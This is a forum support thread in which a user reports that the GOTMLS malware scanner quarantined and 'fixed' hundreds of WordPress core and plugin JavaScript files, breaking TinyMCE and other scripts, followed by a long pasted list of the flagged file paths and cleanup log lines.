GOTMLS killed tinymce
-
594 quarantined today
@gotmls deleted and killed some plugins too
and I believe the tinymce capabilities in admin panel:Check all 200 Items in QuarantineQuarantinedDate Infected
2018-05-24 15:42:262018-05-24 11:45:02Q…/../wp-includes/js/tinymce/utils/validate.js
2018-05-24 15:42:262018-05-24 11:45:02Q…/../wp-includes/js/tinymce/utils/mctabs.js
2018-05-24 15:42:262018-05-24 11:45:02Q…
-
What domain were you having this issue on?
I just tested it on a few of my sites and it does not find anything in any of the standard tinymce files that come in the latest versions of WordPress. Maybe your copy of tinymce was infected with something?
Can you send me the “infected” files so that I can inspect them?
You can email me directly:
eli AT gotmls DOT netRun it on multiple domains as usual
After cleaning basically killed everything js, ajax load, sliders and all in all templates and plugins
Here is the full list of detection:!/www/wp-admin/js/accordion.js
!/www/wp-admin/js/accordion.min.js
!/www/wp-admin/js/code-editor.js
!/www/wp-admin/js/code-editor.min.js
!/www/wp-admin/js/color-picker.js
!/www/wp-admin/js/color-picker.min.js
!/www/wp-admin/js/comment.js
!/www/wp-admin/js/comment.min.js
!/www/wp-admin/js/common.js
!/www/wp-admin/js/common.min.js
!/www/wp-admin/js/custom-background.js
!/www/wp-admin/js/custom-background.min.js
!/www/wp-admin/js/custom-header.js
!/www/wp-admin/js/customize-controls.js
!/www/wp-admin/js/customize-controls.min.js
!/www/wp-admin/js/customize-nav-menus.js
!/www/wp-admin/js/customize-nav-menus.min.js
!/www/wp-admin/js/customize-widgets.js
!/www/wp-admin/js/customize-widgets.min.js
!/www/wp-admin/js/dashboard.js
!/www/wp-admin/js/dashboard.min.js
!/www/wp-admin/js/edit-comments.js
!/www/wp-admin/js/edit-comments.min.js
!/www/wp-admin/js/editor-expand.js
!/www/wp-admin/js/editor-expand.min.js
!/www/wp-admin/js/editor.js
!/www/wp-admin/js/editor.min.js
!/www/wp-admin/js/farbtastic.js
!/www/wp-admin/js/gallery.js
!/www/wp-admin/js/gallery.min.js
!/www/wp-admin/js/image-edit.js
!/www/wp-admin/js/image-edit.min.js
!/www/wp-admin/js/inline-edit-post.js
!/www/wp-admin/js/inline-edit-post.min.js
!/www/wp-admin/js/inline-edit-tax.js
!/www/wp-admin/js/inline-edit-tax.min.js
!/www/wp-admin/js/iris.min.js
!/www/wp-admin/js/language-chooser.js
!/www/wp-admin/js/language-chooser.min.js
!/www/wp-admin/js/link.js
!/www/wp-admin/js/link.min.js
!/www/wp-admin/js/media-gallery.js
!/www/wp-admin/js/media-gallery.min.js
!/www/wp-admin/js/media-upload.js
!/www/wp-admin/js/media-upload.min.js
!/www/wp-admin/js/media.js
!/www/wp-admin/js/media.min.js
!/www/wp-admin/js/nav-menu.js
!/www/wp-admin/js/nav-menu.min.js
!/www/wp-admin/js/password-strength-meter.js
!/www/wp-admin/js/password-strength-meter.min.js
!/www/wp-admin/js/plugin-install.js
!/www/wp-admin/js/plugin-install.min.js
!/www/wp-admin/js/post.js
!/www/wp-admin/js/post.min.js
!/www/wp-admin/js/postbox.js
!/www/wp-admin/js/postbox.min.js
!/www/wp-admin/js/revisions.js
!/www/wp-admin/js/revisions.min.js
!/www/wp-admin/js/set-post-thumbnail.js
!/www/wp-admin/js/set-post-thumbnail.min.js
!/www/wp-admin/js/svg-painter.js
!/www/wp-admin/js/svg-painter.min.js
!/www/wp-admin/js/tags-box.js
!/www/wp-admin/js/tags-box.min.js
!/www/wp-admin/js/tags-suggest.js
!/www/wp-admin/js/tags-suggest.min.js
!/www/wp-admin/js/tags.js
!/www/wp-admin/js/tags.min.js
!/www/wp-admin/js/theme-plugin-editor.js
!/www/wp-admin/js/theme-plugin-editor.min.js
!/www/wp-admin/js/theme.js
!/www/wp-admin/js/theme.min.js
!/www/wp-admin/js/updates.js
!/www/wp-admin/js/updates.min.js
!/www/wp-admin/js/user-profile.js
!/www/wp-admin/js/user-profile.min.js
!/www/wp-admin/js/user-suggest.js
!/www/wp-admin/js/user-suggest.min.js
!/www/wp-admin/js/widgets.js
!/www/wp-admin/js/widgets.min.js
!/www/wp-admin/js/word-count.js
!/www/wp-admin/js/word-count.min.js
!/www/wp-admin/js/wp-fullscreen-stub.js
!/www/wp-admin/js/wp-fullscreen-stub.min.js
!/www/wp-admin/js/xfn.js
!/www/wp-admin/js/xfn.min.js
!/www/wp-admin/js/widgets/custom-html-widgets.js
!/www/wp-admin/js/widgets/custom-html-widgets.min.js
!/www/wp-admin/js/widgets/media-audio-widget.js
!/www/wp-admin/js/widgets/media-audio-widget.min.js
!/www/wp-admin/js/widgets/media-gallery-widget.js
!/www/wp-admin/js/widgets/media-gallery-widget.min.js
!/www/wp-admin/js/widgets/media-image-widget.js
!/www/wp-admin/js/widgets/media-image-widget.min.js
!/www/wp-admin/js/widgets/media-video-widget.js
!/www/wp-admin/js/widgets/media-video-widget.min.js
!/www/wp-admin/js/widgets/media-widgets.js
!/www/wp-admin/js/widgets/media-widgets.min.js
!/www/wp-admin/js/widgets/text-widgets.js
!/www/wp-admin/js/widgets/text-widgets.min.js
!/www/wp-content/plugins/akismet/_inc/akismet.js
!/www/wp-content/plugins/akismet/_inc/form.js
!/www/wp-content/plugins/featured-content-gallery/scripts/HistoryManager.js
!/www/wp-content/plugins/featured-content-gallery/scripts/jd.gallery.js
!/www/wp-content/plugins/featured-content-gallery/scripts/jd.gallery.js.php
!/www/wp-content/plugins/featured-content-gallery/scripts/jd.gallery.set.js
!/www/wp-content/plugins/featured-content-gallery/scripts/jd.gallery.transitions.js
!/www/wp-content/plugins/featured-content-gallery/scripts/mootools.v1.11.ext.js
!/www/wp-content/plugins/featured-content-gallery/scripts/mootools.v1.11.js
!/www/wp-content/plugins/featured-content-gallery/scripts/mootools.v1.11.uncompressed.js
!/www/wp-content/plugins/simplemodal-contact-form-smcf/js/jquery.simplemodal.js
!/www/wp-content/plugins/simplemodal-contact-form-smcf/js/smcf.js
!/www/wp-content/plugins/wp-cumulus/swfobject.js
!/www/wp-content/plugins/wysija-newsletters/js/admin-ajax-proto…js
!/www/wp-content/plugins/wysija-newsletters/js/admin-ajax…js
!/www/wp-content/plugins/wysija-newsletters/js/admin-campaigns-articles…js
!/www/wp-content/plugins/wysija-newsletters/js/admin-campaigns-autopost…js
!/www/wp-content/plugins/wysija-newsletters/js/admin-campaigns-bookmarks…js
!/www/wp-content/plugins/wysija-newsletters/js/admin-campaigns-default…js
!/www/wp-content/plugins/wysija-newsletters/js/admin-campaigns-dividers…js
!/www/wp-content/plugins/wysija-newsletters/js/admin-campaigns-edit…js
!/www/wp-content/plugins/wysija-newsletters/js/admin-campaigns-editAutonl…js
!/www/wp-content/plugins/wysija-newsletters/js/admin-campaigns-editDetails…js
!/www/wp-content/plugins/wysija-newsletters/js/admin-campaigns-editTemplate…js
!/www/wp-content/plugins/wysija-newsletters/js/admin-campaigns-image_data…js
!/www/wp-content/plugins/wysija-newsletters/js/admin-campaigns-medias…js
!/www/wp-content/plugins/wysija-newsletters/js/admin-campaigns-themes…js
!/www/wp-content/plugins/wysija-newsletters/js/admin-campaigns-viewstats…js
!/www/wp-content/plugins/wysija-newsletters/js/admin-campaigns-welcome_new…js
!/www/wp-content/plugins/wysija-newsletters/js/admin-config-form_widget_settings…js
!/www/wp-content/plugins/wysija-newsletters/js/admin-config-settings…js
!/www/wp-content/plugins/wysija-newsletters/js/admin-global…js
!/www/wp-content/plugins/wysija-newsletters/js/admin-listing…js
!/www/wp-content/plugins/wysija-newsletters/js/admin-statistics-filter…js
!/www/wp-content/plugins/wysija-newsletters/js/admin-statistics…js
!/www/wp-content/plugins/wysija-newsletters/js/admin-subscribers-export…js
!/www/wp-content/plugins/wysija-newsletters/js/admin-subscribers-import…js
!/www/wp-content/plugins/wysija-newsletters/js/admin-subscribers-importmatch…js
!/www/wp-content/plugins/wysija-newsletters/js/admin-subscribers…js
!/www/wp-content/plugins/wysija-newsletters/js/admin-tmce…js
!/www/wp-content/plugins/wysija-newsletters/js/admin-wysija-global…js
!/www/wp-content/plugins/wysija-newsletters/js/admin-wysija…js
!/www/wp-content/plugins/wysija-newsletters/js/admin…js
!/www/wp-content/plugins/wysija-newsletters/js/analytics…js
!/www/wp-content/plugins/wysija-newsletters/js/base-script-64…js
!/www/wp-content/plugins/wysija-newsletters/js/forms…js
!/www/wp-content/plugins/wysija-newsletters/js/front-subscribers…js
!/www/wp-content/plugins/wysija-newsletters/js/konami…js
!/www/wp-content/plugins/wysija-newsletters/js/timer…js
!/www/wp-content/plugins/wysija-newsletters/js/tinymce_init…js
!/www/wp-content/plugins/wysija-newsletters/js/wysija-charts…js
!/www/wp-content/plugins/wysija-newsletters/js/wysija-editor…js
!/www/wp-content/plugins/wysija-newsletters/js/wysija-form-editor…js
!/www/wp-content/plugins/wysija-newsletters/js/wysija-lazyload…js
!/www/wp-content/plugins/wysija-newsletters/js/excolor/jquery…modcoder…excolor…js
!/www/wp-content/plugins/wysija-newsletters/js/fields/select2-simple…js
!/www/wp-content/plugins/wysija-newsletters/js/fields/select2-terms…js
!/www/wp-content/plugins/wysija-newsletters/js/jquery/jquery…cookie…js
!/www/wp-content/plugins/wysija-newsletters/js/jquery/jquery…matchColumn…js
!/www/wp-content/plugins/wysija-newsletters/js/jquery/jquery…userStatusMapping…js
!/www/wp-content/plugins/wysija-newsletters/js/jquery/pluploadHandler…js
!/www/wp-content/plugins/wysija-newsletters/js/jquery/uploadHandlers…js
!/www/wp-content/plugins/wysija-newsletters/js/jquery/ui/jquery…ui…core…js
!/www/wp-content/plugins/wysija-newsletters/js/jquery/ui/jquery…ui…datepicker…js
!/www/wp-content/plugins/wysija-newsletters/js/jscolor/jscolor…js
!/www/wp-content/plugins/wysija-newsletters/js/prototype/builder…js
!/www/wp-content/plugins/wysija-newsletters/js/prototype/controls…js
!/www/wp-content/plugins/wysija-newsletters/js/prototype/dragdrop…js
!/www/wp-content/plugins/wysija-newsletters/js/prototype/effects…js
!/www/wp-content/plugins/wysija-newsletters/js/prototype/prototype…js
!/www/wp-content/plugins/wysija-newsletters/js/prototype/scriptaculous…js
!/www/wp-content/plugins/wysija-newsletters/js/prototype/slider…js
!/www/wp-content/plugins/wysija-newsletters/js/prototype/sound…js
!/www/wp-content/plugins/wysija-newsletters/js/select2/select2-l10n…js
!/www/wp-content/plugins/wysija-newsletters/js/select2/select2…js
!/www/wp-content/plugins/wysija-newsletters/js/select2/select2…min…js
!/www/wp-content/plugins/wysija-newsletters/js/thickbox/thickbox…js
!/www/wp-content/plugins/wysija-newsletters/js/tinymce/tiny_mce…js
!/www/wp-content/plugins/wysija-newsletters/js/tinymce/tiny_mce_popup…js
!/www/wp-content/plugins/wysija-newsletters/js/tinymce/langs/en…js
!/www/wp-content/plugins/wysija-newsletters/js/tinymce/plugins/autoresize/editor_plugin…js
!/www/wp-content/plugins/wysija-newsletters/js/tinymce/plugins/directionality/editor_plugin…js
!/www/wp-content/plugins/wysija-newsletters/js/tinymce/plugins/inlinepopups/editor_plugin…js
!/www/wp-content/plugins/wysija-newsletters/js/tinymce/plugins/paste/editor_plugin…js
!/www/wp-content/plugins/wysija-newsletters/js/tinymce/plugins/paste/js/pastetext…js
!/www/wp-content/plugins/wysija-newsletters/js/tinymce/plugins/paste/js/pasteword…js
!/www/wp-content/plugins/wysija-newsletters/js/tinymce/plugins/paste/langs/en_dlg…js
!/www/wp-content/plugins/wysija-newsletters/js/tinymce/plugins/wysija_custom_fields/editor_plugin…js
!/www/wp-content/plugins/wysija-newsletters/js/tinymce/themes/advanced/editor_template…js
!/www/wp-content/plugins/wysija-newsletters/js/tinymce/themes/advanced/js/about…js
!/www/wp-content/plugins/wysija-newsletters/js/tinymce/themes/advanced/js/anchor…js
!/www/wp-content/plugins/wysija-newsletters/js/tinymce/themes/advanced/js/charmap…js
!/www/wp-content/plugins/wysija-newsletters/js/tinymce/themes/advanced/js/color_picker…js
!/www/wp-content/plugins/wysija-newsletters/js/tinymce/themes/advanced/js/image…js
!/www/wp-content/plugins/wysija-newsletters/js/tinymce/themes/advanced/js/link…js
!/www/wp-content/plugins/wysija-newsletters/js/tinymce/themes/advanced/js/source_editor…js
!/www/wp-content/plugins/wysija-newsletters/js/tinymce/themes/advanced/langs/en…js
!/www/wp-content/plugins/wysija-newsletters/js/tinymce/themes/advanced/langs/en_dlg…js
!/www/wp-content/plugins/wysija-newsletters/js/tinymce/utils/editable_selects…js
!/www/wp-content/plugins/wysija-newsletters/js/tinymce/utils/form_utils…js
!/www/wp-content/plugins/wysija-newsletters/js/tinymce/utils/mctabs…js
!/www/wp-content/plugins/wysija-newsletters/js/tinymce/utils/validate…js
!/www/wp-content/plugins/wysija-newsletters/js/validate/jquery…validationEngine…js
!/www/wp-content/plugins/wysija-newsletters/js/validate/validate…js
!/www/wp-content/plugins/wysija-newsletters/js/validate/contrib/other-validations…js
!/www/wp-content/plugins/wysija-newsletters/js/vendor/bootstrap…tooltip…js
!/www/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery…validationEngine-ar…js
!/www/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery…validationEngine-ca…js
!/www/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery…validationEngine-cs…js
!/www/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery…validationEngine-cz…js
!/www/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery…validationEngine-da…js
!/www/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery…validationEngine-de…js
!/www/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery…validationEngine-el…js
!/www/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery…validationEngine-en…js
!/www/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery…validationEngine-es…js
!/www/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery…validationEngine-et…js
!/www/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery…validationEngine-fa…js
!/www/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery…validationEngine-fi…js
!/www/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery…validationEngine-fr…js
!/www/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery…validationEngine-he…js
!/www/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery…validationEngine-hr…js
!/www/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery…validationEngine-hu…js
!/www/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery…validationEngine-id…js
!/www/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery…validationEngine-it…js
!/www/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery…validationEngine-ja…js
!/www/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery…validationEngine-lt…js
!/www/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery…validationEngine-nl…js
!/www/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery…validationEngine-no…js
!/www/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery…validationEngine-pl…js
!/www/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery…validationEngine-pt…js
!/www/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery…validationEngine-pt_BR…js
!/www/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery…validationEngine-ro…js
!/www/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery…validationEngine-ru…js
!/www/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery…validationEngine-sr_Cyrl…js
!/www/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery…validationEngine-sr_Latn…js
!/www/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery…validationEngine-sv…js
!/www/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery…validationEngine-tr…js
!/www/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery…validationEngine-uk…js
!/www/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery…validationEngine-vi…js
!/www/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery…validationEngine-zh_CN…js
!/www/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery…validationEngine-zh_TW…js
!/www/wp-content/plugins/wysija-newsletters/mce/wysija_register/editor_plugin…js
!/www/wp-content/plugins/wysija-newsletters/mce/wysija_register/editor_plugin_39…js
!/www/wp-content/themes/lifestyle_10/javascript/date…js
Fixing /www/wp-includes/js/codemirror/codemirror.min.js … Success!
Fixing /www/wp-includes/js/codemirror/csslint.js … Success!
Fixing /www/wp-includes/js/codemirror/htmlhint-kses.js … Success!
Fixing /www/wp-includes/js/codemirror/htmlhint.js … Success!
Fixing /www/wp-includes/js/codemirror/jshint.js … Success!
Fixing /www/wp-includes/js/codemirror/jsonlint.js … Success!
Fixing /www/wp-includes/js/imgareaselect/jquery.imgareaselect.js … Success!
Fixing /www/wp-includes/js/imgareaselect/jquery.imgareaselect.min.js … Success!
Fixing /www/wp-includes/js/crop/cropper.js … Success!
Fixing /www/wp-includes/js/admin-bar.js … Success!
Fixing /www/wp-includes/js/admin-bar.min.js … Success!
Fixing /www/wp-includes/js/api-request.js … Success!
Fixing /www/wp-includes/js/api-request.min.js … Success!
Fixing /www/wp-includes/js/autosave.js … Success!
Fixing /www/wp-includes/js/autosave.min.js … Success!
Fixing /www/wp-includes/js/backbone.min.js … Success!
Fixing /www/wp-includes/js/colorpicker.js … Success!
Fixing /www/wp-includes/js/colorpicker.min.js … Success!
Fixing /www/wp-includes/js/comment-reply.js … Success!
Fixing /www/wp-includes/js/comment-reply.min.js … Success!
Fixing /www/wp-includes/js/customize-base.js … Success!
Fixing /www/wp-includes/js/customize-base.min.js … Success!
Fixing /www/wp-includes/js/customize-loader.js … Success!
Fixing /www/wp-includes/js/customize-loader.min.js … Success!
Fixing /www/wp-includes/js/customize-models.js … Success!
Fixing /www/wp-includes/js/customize-models.min.js … Success!
Fixing /www/wp-includes/js/customize-preview-nav-menus.js … Success!
Fixing /www/wp-includes/js/customize-preview-nav-menus.min.js … Success!
Fixing /www/wp-includes/js/customize-preview-widgets.js … Success!
Fixing /www/wp-includes/js/customize-preview-widgets.min.js … Success!
Fixing /www/wp-includes/js/customize-preview.js … Success!
Fixing /www/wp-includes/js/customize-preview.min.js … Success!
Fixing /www/wp-includes/js/customize-selective-refresh.js … Success!
Fixing /www/wp-includes/js/customize-selective-refresh.min.js … Success!
Fixing /www/wp-includes/js/customize-views.js … Success!
Fixing /www/wp-includes/js/customize-views.min.js … Success!
Fixing /www/wp-includes/js/heartbeat.js … Success!
Fixing /www/wp-includes/js/heartbeat.min.js … Success!
Fixing /www/wp-includes/js/hoverIntent.js … Success!
Fixing /www/wp-includes/js/hoverIntent.min.js … Success!
Fixing /www/wp-includes/js/imagesloaded.min.js … Success!
Fixing /www/wp-includes/js/json2.js … Success!
Fixing /www/wp-includes/js/json2.min.js … Success!
Fixing /www/wp-includes/js/masonry.min.js … Success!
Fixing /www/wp-includes/js/mce-view.js … Success!
Fixing /www/wp-includes/js/mce-view.min.js … Success!
Fixing /www/wp-includes/js/media-audiovideo.js … Success!
Fixing /www/wp-includes/js/media-audiovideo.min.js … Success!
Fixing /www/wp-includes/js/media-editor.js … Success!
Fixing /www/wp-includes/js/media-editor.min.js … Success!
Fixing /www/wp-includes/js/media-grid.js … Success!
Fixing /www/wp-includes/js/media-grid.min.js … Success!
Fixing /www/wp-includes/js/media-models.js … Success!
Fixing /www/wp-includes/js/media-models.min.js … Success!
Fixing /www/wp-includes/js/media-views.js … Success!
Fixing /www/wp-includes/js/media-views.min.js … Success!
Fixing /www/wp-includes/js/quicktags.js … Success!
Fixing /www/wp-includes/js/quicktags.min.js … Success!
Fixing /www/wp-includes/js/shortcode.js … Success!
Fixing /www/wp-includes/js/shortcode.min.js … Success!
Fixing /www/wp-includes/js/swfobject.js … Success!
Fixing /www/wp-includes/js/tw-sack.js … Success!
Fixing /www/wp-includes/js/tw-sack.min.js … Success!
Fixing /www/wp-includes/js/twemoji.js … Success!
Fixing /www/wp-includes/js/twemoji.min.js … Success!
Fixing /www/wp-includes/js/underscore.min.js … Success!
Fixing /www/wp-includes/js/utils.js … Success!
Fixing /www/wp-includes/js/utils.min.js … Success!
Fixing /www/wp-includes/js/wp-a11y.js … Success!
Fixing /www/wp-includes/js/wp-a11y.min.js … Success!
Fixing /www/wp-includes/js/wp-ajax-response.js … Success!
Fixing /www/wp-includes/js/wp-ajax-response.min.js … Success!
Fixing /www/wp-includes/js/wp-api.js … Success!
Fixing /www/wp-includes/js/wp-api.min.js … Success!
Fixing /www/wp-includes/js/wp-auth-check.js … Success!
Fixing /www/wp-includes/js/wp-auth-check.min.js … Success!
Fixing /www/wp-includes/js/wp-backbone.js … Success!
Fixing /www/wp-includes/js/wp-backbone.min.js … Success!
Fixing /www/wp-includes/js/wp-custom-header.js … Success!
Fixing /www/wp-includes/js/wp-custom-header.min.js … Success!
Fixing /www/wp-includes/js/wp-embed-template.js … Success!
Fixing /www/wp-includes/js/wp-embed-template.min.js … Success!
Fixing /www/wp-includes/js/wp-embed.js … Success!
Fixing /www/wp-includes/js/wp-embed.min.js … Success!
Fixing /www/wp-includes/js/wp-emoji-loader.js … Success!
Fixing /www/wp-includes/js/wp-emoji-loader.min.js … Success!
Fixing /www/wp-includes/js/wp-emoji-release.min.js … Success!
Fixing /www/wp-includes/js/wp-emoji.js … Success!
Fixing /www/wp-includes/js/wp-emoji.min.js … Success!
Fixing /www/wp-includes/js/wp-list-revisions.js … Success!
Fixing /www/wp-includes/js/wp-list-revisions.min.js … Success!
Fixing /www/wp-includes/js/wp-lists.js … Success!
Fixing /www/wp-includes/js/wp-lists.min.js … Success!
Fixing /www/wp-includes/js/wp-pointer.js … Success!
Fixing /www/wp-includes/js/wp-pointer.min.js … Success!
Fixing /www/wp-includes/js/wp-sanitize.js … Success!
Fixing /www/wp-includes/js/wp-sanitize.min.js … Success!
Fixing /www/wp-includes/js/wp-util.js … Success!
Fixing /www/wp-includes/js/wp-util.min.js … Success!
Fixing /www/wp-includes/js/wpdialog.js … Success!
Fixing /www/wp-includes/js/wpdialog.min.js … Success!
Fixing /www/wp-includes/js/wplink.js … Success!
Fixing /www/wp-includes/js/wplink.min.js … Success!
Fixing /www/wp-includes/js/zxcvbn-async.js … Success!
Fixing /www/wp-includes/js/zxcvbn-async.min.js … Success!
Fixing /www/wp-includes/js/zxcvbn.min.js … Success!
Fixing /www/wp-includes/js/jcrop/jquery.Jcrop.min.js … Success!
Fixing /www/wp-includes/js/jquery/jquery-migrate.js … Success!
Fixing /www/wp-includes/js/jquery/jquery-migrate.min.js … Success!
Fixing /www/wp-includes/js/jquery/jquery.color.min.js … Success!
Fixing /www/wp-includes/js/jquery/jquery.form.js … Success!
Fixing /www/wp-includes/js/jquery/jquery.form.min.js … Success!
Fixing /www/wp-includes/js/jquery/jquery.hotkeys.js … Success!
Fixing /www/wp-includes/js/jquery/jquery.hotkeys.min.js … Success!
Fixing /www/wp-includes/js/jquery/jquery.js … Success!
Fixing /www/wp-includes/js/jquery/jquery.masonry.min.js … Success!
Fixing /www/wp-includes/js/jquery/jquery.query.js … Success!
Fixing /www/wp-includes/js/jquery/jquery.schedule.js … Success!
Fixing /www/wp-includes/js/jquery/jquery.serialize-object.js … Success!
Fixing /www/wp-includes/js/jquery/jquery.table-hotkeys.js … Success!
Fixing /www/wp-includes/js/jquery/jquery.table-hotkeys.min.js … Success!
Fixing /www/wp-includes/js/jquery/jquery.ui.touch-punch.js … Success!
Fixing /www/wp-includes/js/jquery/suggest.js … Success!
Fixing /www/wp-includes/js/jquery/suggest.min.js … Success!
Fixing /www/wp-includes/js/mediaelement/renderers/vimeo.js … Success!
Fixing /www/wp-includes/js/mediaelement/renderers/vimeo.min.js … Success!
Fixing /www/wp-includes/js/mediaelement/mediaelement-and-player.js … Success!
Fixing /www/wp-includes/js/mediaelement/mediaelement-and-player.min.js … Success!
Fixing /www/wp-includes/js/mediaelement/mediaelement-migrate.js … Success!
Fixing /www/wp-includes/js/mediaelement/mediaelement-migrate.min.js … Success!
Fixing /www/wp-includes/js/mediaelement/mediaelement.js … Success!
Fixing /www/wp-includes/js/mediaelement/mediaelement.min.js … Success!
Fixing /www/wp-includes/js/mediaelement/wp-mediaelement.js … Success!
Fixing /www/wp-includes/js/mediaelement/wp-mediaelement.min.js … Success!
Fixing /www/wp-includes/js/mediaelement/wp-playlist.js … Success!
Fixing /www/wp-includes/js/mediaelement/wp-playlist.min.js … Success!
Fixing /www/wp-includes/js/jquery/ui/accordion.min.js … Success!
Fixing /www/wp-includes/js/jquery/ui/autocomplete.min.js … Success!
Fixing /www/wp-includes/js/jquery/ui/button.min.js … Success!
Fixing /www/wp-includes/js/jquery/ui/core.min.js … Success!
Fixing /www/wp-includes/js/jquery/ui/datepicker.min.js … Success!
Fixing /www/wp-includes/js/jquery/ui/dialog.min.js … Success!
Fixing /www/wp-includes/js/jquery/ui/draggable.min.js … Success!
Fixing /www/wp-includes/js/jquery/ui/droppable.min.js … Success!
Fixing /www/wp-includes/js/jquery/ui/effect-blind.min.js … Success!
Fixing /www/wp-includes/js/jquery/ui/effect-bounce.min.js … Success!
Fixing /www/wp-includes/js/jquery/ui/effect-clip.min.js … Success!
Fixing /www/wp-includes/js/jquery/ui/effect-drop.min.js … Success!
Fixing /www/wp-includes/js/jquery/ui/effect-explode.min.js … Success!
Fixing /www/wp-includes/js/jquery/ui/effect-fade.min.js … Success!
Fixing /www/wp-includes/js/jquery/ui/effect-fold.min.js … Success!
Fixing /www/wp-includes/js/jquery/ui/effect-highlight.min.js … Success!
Fixing /www/wp-includes/js/jquery/ui/effect-puff.min.js … Success!
Fixing /www/wp-includes/js/jquery/ui/effect-pulsate.min.js … Success!
Fixing /www/wp-includes/js/jquery/ui/effect-scale.min.js … Success!
Fixing /www/wp-includes/js/jquery/ui/effect-shake.min.js … Success!
Fixing /www/wp-includes/js/jquery/ui/effect-size.min.js … Success!
Fixing /www/wp-includes/js/jquery/ui/effect-slide.min.js … Success!
Fixing /www/wp-includes/js/jquery/ui/effect-transfer.min.js … Success!
Fixing /www/wp-includes/js/jquery/ui/effect.min.js … Success!
Fixing /www/wp-includes/js/jquery/ui/menu.min.js … Success!
Fixing /www/wp-includes/js/jquery/ui/mouse.min.js … Success!
Fixing /www/wp-includes/js/jquery/ui/position.min.js … Success!
Fixing /www/wp-includes/js/jquery/ui/progressbar.min.js … Success!
Fixing /www/wp-includes/js/jquery/ui/resizable.min.js … Success!
Fixing /www/wp-includes/js/jquery/ui/selectable.min.js … Success!
Fixing /www/wp-includes/js/jquery/ui/selectmenu.min.js … Success!
Fixing /www/wp-includes/js/jquery/ui/slider.min.js … Success!
Fixing /www/wp-includes/js/jquery/ui/sortable.min.js … Success!
Fixing /www/wp-includes/js/jquery/ui/spinner.min.js … Success!
Fixing /www/wp-includes/js/jquery/ui/tabs.min.js … Success!
Fixing /www/wp-includes/js/jquery/ui/tooltip.min.js … Success!
Fixing /www/wp-includes/js/jquery/ui/widget.min.js … Success!
Fixing /www/wp-includes/js/swfupload/handlers.js … Success!
Fixing /www/wp-includes/js/swfupload/handlers.min.js … Success!
Fixing /www/wp-includes/js/swfupload/swfupload.js … Success!
Fixing /www/wp-includes/js/thickbox/thickbox.js … Success!
Fixing /www/wp-includes/js/plupload/handlers.js … Success!
Fixing /www/wp-includes/js/plupload/handlers.min.js … Success!
Fixing /www/wp-includes/js/plupload/moxie.js … Success!
Fixing /www/wp-includes/js/plupload/moxie.min.js … Success!
Fixing /www/wp-includes/js/plupload/plupload.js … Success!
Fixing /www/wp-includes/js/plupload/plupload.min.js … Success!
Fixing /www/wp-includes/js/plupload/wp-plupload.js … Success!
Fixing /www/wp-includes/js/plupload/wp-plupload.min.js … Success!
Fixing /www/wp-includes/js/tinymce/langs/wp-langs-en.js … Success!
Fixing /www/wp-includes/js/tinymce/tiny_mce_popup.js … Success!
Fixing /www/wp-includes/js/tinymce/tinymce.min.js … Success!
Fixing /www/wp-includes/js/tinymce/wp-tinymce.js.gz … Success!
Fixing /www/wp-includes/js/tinymce/plugins/compat3x/plugin.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/compat3x/plugin.min.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/charmap/plugin.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/charmap/plugin.min.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/colorpicker/plugin.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/colorpicker/plugin.min.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/directionality/plugin.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/directionality/plugin.min.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/fullscreen/plugin.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/fullscreen/plugin.min.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/hr/plugin.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/hr/plugin.min.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/image/plugin.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/image/plugin.min.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/link/plugin.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/link/plugin.min.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/lists/plugin.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/lists/plugin.min.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/tabfocus/plugin.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/tabfocus/plugin.min.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/paste/plugin.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/paste/plugin.min.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/media/plugin.js … Success!
